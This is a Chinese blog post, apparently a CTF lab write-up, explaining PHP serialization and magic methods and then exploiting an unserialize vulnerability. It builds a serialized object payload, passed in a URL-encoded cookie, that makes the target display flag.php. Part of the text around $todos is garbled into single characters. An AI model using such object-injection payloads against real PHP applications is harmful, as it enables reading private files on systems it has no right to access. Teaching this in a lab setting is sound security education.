UNSERIALIZE——反序列化漏洞
作者:@Xuno
本文为作者原创,转载请注明出处:https://www.cnblogs.com/MaoheLaoXu/p/17175552.html
Unserialize反序列化
什么是序列化?
序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。
【将状态信息保存为字符串】
简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中
什么是反序列化?
序列化就是将对象的状态信息转为字符串储存起来,那么反序列化就是再将这个状态信息拿出来使用。(重新再转化为对象或者其他的)
【将字符串转化为状态信息】
我们首先先认识一下一个函数
__FILE__
返回的是文件路径
show_source(__FILE__)
这是返回当前文件源码,在CTF大赛用的可能会很多
serialize()
将对象转化为字符串
当在php中创建了一个对象后,可以通过serialize()把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。
<?php
show_source(__FILE__);
class chybeta{
var $test = '123';
}
$class1 = new chybeta;
$class1_ser = serialize($class1);
echo "<hr>";
print_r($class1_ser);
?>
O:7:“chybeta”:1:{s:4:“test”;s:3:“123”;}
这串字符的含义:变量类型;
类名长度;类名;属性变量
{属性类型;属性名长度;属性名;属性值类型;属性值长度;属性值内容}
o 表示object对象
7 表示对象名称有7个字符
chybeta 对象名称
1 表示只有一个值
s 表示 string 字符串
4 表示test 字符串长度
这个函数
unserialize()
和序列化的serialize()刚刚好相反,是将字符串转化为对象
print_r
输出非字符串
魔术方法
php中有一类特殊的方法叫“Magic function”(魔术方法), 这里我们着重关注一下几个:
__construct():当对象创建(new)时会自动调用。但在unserialize()时是不会自动调用的。(构造函数)
__destruct():当对象被销毁时会自动调用。(析构函数)
__wakeup() :如前所提,unserialize()时会自动调用。
还有一个__tostring(),只要调用了echo 来打印对象体,就回自动调用__tostring()
我们直接开始进入靶场
我们发现他是只要输入了source,就会进入第一个if分支
然后输出echo $s,再调用__tostring()方法,显示Readme.txt的内容
我们往下看,发现除了下面一个if分支,存在一个unserialize()函数
但是,它不存在echo;
我们继续往下看,发现
这里存在一个
<?php foreach($todos as $todo):?>
<li><?=$todo?></li>
<?php endforeach;?>
而*
- <?=$todo?>
- *其实是等价于echo的,我们第二个if分支调用了
t
o
d
o
s
,
刚
刚
好
这
里
它
用
∗
∗
f
o
r
e
a
c
h
(
)
∗
∗
也
调
用
了
todos,刚刚好这里它用**foreach()**也调用了
todos,刚刚好这里它用∗∗foreach()∗∗也调用了todos
我们可能不知道这个foreach()是干嘛的,我们直接百度,知道了它是一种遍历数组简便方法
我们看完所有代码,是不是可以去控制第二个if分支条件中的$todos,来控制反序列化,让它去读取我们想让它读取的文件呢?
我们首先先制作出序列化好的代码,修改代码,拿到序列化过后的字符串
<?php Class readme{ public function __toString() { return highlight_file('Readme.txt', true).highlight_file($this->source, true); } } if(isset($_GET['source'])){ $s = new readme(); $s->source = 'flag.php'; $s = [$s]; echo serialize($s); } ?>
a:1:{i:0;O:6:“readme”:1:{s:6:“source”;s:8:“flag.php”;}}
e2d4f7dcc43ee1db7f69e76303d0105c
因为它源代码是进行了一次md5解密的,再加上一个substr(0,15)所以我们可以设置cookie传参中的$c的值了
$c = e2d4f7dcc43ee1db7f69e76303d0105ca:1:{i:0;O:6:“readme”:1:{s:6:“source”;s:8:“flag.php”;}}因为cookie传参是要进行一次url编码的,我们编码一下,再传
todos=e2d4f7dcc43ee1db7f69e76303d0105ca%3a1%3a%7bi%3a0%3bO%3a6%3a%22readme%22%3a1%3a%7bs%3a6%3a%22source%22%3bs%3a8%3a%22flag.php%22%3b%7d%7d
如果您觉得阅读本文对您有帮助,请点一下“推荐”按钮,您的“推荐”将是我最大的写作动力!欢迎各位转载,但是未经作者本人同意,转载文章之后必须在文章页面明显位置给出作者和原文连接,否则保留追究法律责任的权利。
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步